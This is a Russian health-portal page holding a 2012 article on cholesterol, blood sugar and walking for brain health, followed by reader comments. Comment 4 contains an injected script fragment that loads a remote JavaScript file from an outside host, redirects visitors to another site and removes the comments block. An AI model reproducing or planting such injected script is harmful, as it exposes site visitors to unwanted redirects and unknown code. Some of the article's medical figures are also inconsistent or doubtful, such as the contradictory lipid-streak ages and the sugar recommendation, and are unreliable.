Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  3 цифры для мозга  >>  3 цифры для мозга
 
Обратная связь
 

3 цифры для мозга

Размер шрифта
27 января 2012 08:55
  • google_analytics: false
  • Нравится

Любому человеку нужно знать, каков нормальный уровень холестерина в крови, уровень сахара, и какие физические нагрузки должен ежедневно получать организм. Только зная эти три показателя, можно сохранить здоровье до старости.

1

5,5

Это нормальное содержание холестерина в крови в ммоль/л.

Холестерин необходим для синтеза солей желчных кислот, является компонентом процесса переваривания жиров, помогает создавать витамин D и является компонентом миелиновой оболочки нервных волокон, которая улучшает проводимость импульсов.

Холестерин формирует миелиновую оболочку нервных волокон, которая играет роль изоленты. Она предотвращает выхождения импульса за пределы волокна и улучшает скорость передачи импульса. Благодаря этой изоляции наш мозг может работать, и мы нормально живем.

Слишком высокий уровень холестерина может привести к развитию атеросклероза. Первые признаки начинающегося атерогенеза из-за направильного питания обнаруживаются уже у детей 9 – 10 лет. К 25 годам они выявляются (в виде липидных полосок) на поверхности аорты. В 10 – 15-летнем возрасте липидные полоски формируются в коронарных артериях, а у большинства 30-40-летних людей они выявля¬ются в сосудах мозга.

Жир в сосудах совсем не нужен, поэтому организм начинает снижать выведение жира из клеток и, наоборот увеличивает введение жира в клетки, чтобы убрать его из сосудов. Проникая в стенки сосудов, жир образует атеросклеротические бляшки, которая может стать неустойчивой и оторваться. Она повреждает стенки сосудов, что вызывает цепь событий, что приводит к образованию тромба и воспаления. Все это может привести к инсульту или инфаркту и смерти.

1

Что делать

  • Измеряйте уровень холестерина.
  • Похудейте. Лишний вес – это лишний жир. Если вы не избавитесь от лишнего жира, то он будет накапливаться в сосудах и образовывать бляшки.
  • Правильное питание. С помощью диеты вы можете снизить показатели на 10-15%.
  • Ограничить потребления продуктов, содержащих холестерин. Вместо животных жиров – растительные масла. Увеличьте количество омега 3-жирных кислот с помощью этих продуктов: лосось, скумбрия, грецкие орехи, миндаль.

6

Это нормальный уровень сахара в крови. Сахар необходим для работы нашего мозга. Мозг потребляет 20% дневной нормы калорий. Калорийность сахара – 387 ккал. Инсулин стимулирует клетки мозга, чтобы заставить их брать глюкозу из крови, чтобы получить энергию. Другими словами, глюкоза – это друг, но потреблять его надо в разумных пределах.

Высокий уровень глюкозы медленно, но верно повреждает клетки во всем теле, в том числе в головной мозг.Высокий уровень сахара и инсулина в крови может привести к повреждению мелких кровеносных сосудов в мозге, и в конечном итоге привести к нарушению циркуляции. Это объясняет, почему диабет 2 типа вредит мозгу. При болезни Альцгеймера, мозг, в особенности части, которые касаются памяти и личности, становятся резистентными к инсулину.

Избыток сахара может привести к развитию диабета 2 типа.

1

Что делать

  • Потребляйте сладкие продукты в разумных количествах.
  • Измеряйте уровень сахара в крови, если у вас есть лишний вес.
  • Пейте простую питьевую воду или напитки без сахара. Американская кардиологическая ассоциация рекомендует мужчинам потреблять 24 г сахара в день или 6 чайных ложек.
  • Помните, что некоторые продукты содержат сахар. В банане – 7 г сахара. В яблоке – около 2 г сахара. Конфета шоколадная – 10 г сахара.

40

Не менее 40 минут необходимо ежедневно ходить пешком. Мозгу, как и любому другому органу нужен кислород для нормальной жизнедеятельности! Единственным переносчиком кислорода в организме является кровь. Когда мы занимаемся спортом, то кровь проходит через весь организм, потому что при нагрузке органы требуют больше крови.

Помимо этого при регулярных тренировках появляются новые сосуды, которые обеспечивают адекватное насыщение кислородом и другими питательными вещами.

Что делать

  • Лучшее, что вы можете сделать – это двигаться!
  • Используйте любую возможность для движения: ходите пешком на работу, ходите по офису, используйте лестницы вместо лифта.


Сюжеты по теме:
3 цифры для мозга. Какие показатели важно держать под контролем

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

27 января 2012 в 15:35

Цитировать   |   Пожаловаться

Наверное, три числа для мозга все-таки?

2 - Гость

20 апреля 2012 в 17:48

Цитировать   |   Пожаловаться

Наш организм усваивает не сахар (дисахарид: глюкоза плюс фруктоза), а глюкозу. Для усвоения глюкозы мозг не нуждается в инсулине, работают другие механизмы.

Гость 20 апреля 2012 в 17:48
Для усвоения глюкозы мозг не нуждается в инсулине
 "... Инсулин стимулирует клетки мозга, чтобы заставить их брать глюкозу из крови, чтобы получить энергию. ..." Здесь не имеется ввиду, что этот процесс происходит локально - в ГМ, а лишь указание на то, что импульс для метаболизма глюкозы из крови исходит из ЦНС, при определенных уровнях инсулина. 

4 - zzzzzz

30 июня 2015 в 23:59

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Лучшие привычки для молодости мозга   Как мы реагируем на стресс   Лечим головную боль без лекарств   Новогодняя аптечка  
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 10 мая 2013И было у нее три сына: один – умный, второй – глупый, а третий – футболист! Ученые обнаружили связь между футболом и снижением интеллекта
 
09 мая 2013Как воспитывать ребенка: палка или пряник? Ученые докопались до истины 02 апреля 2013Революция в лечении головной боли
 

Слайдшоу

1
Почему у вас болит голова? Самые неожиданные причины
Мифы и правда о старческом слабоумии
Что сделает вас глупой?

Тесты

Знаете ли вы свой мозг?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.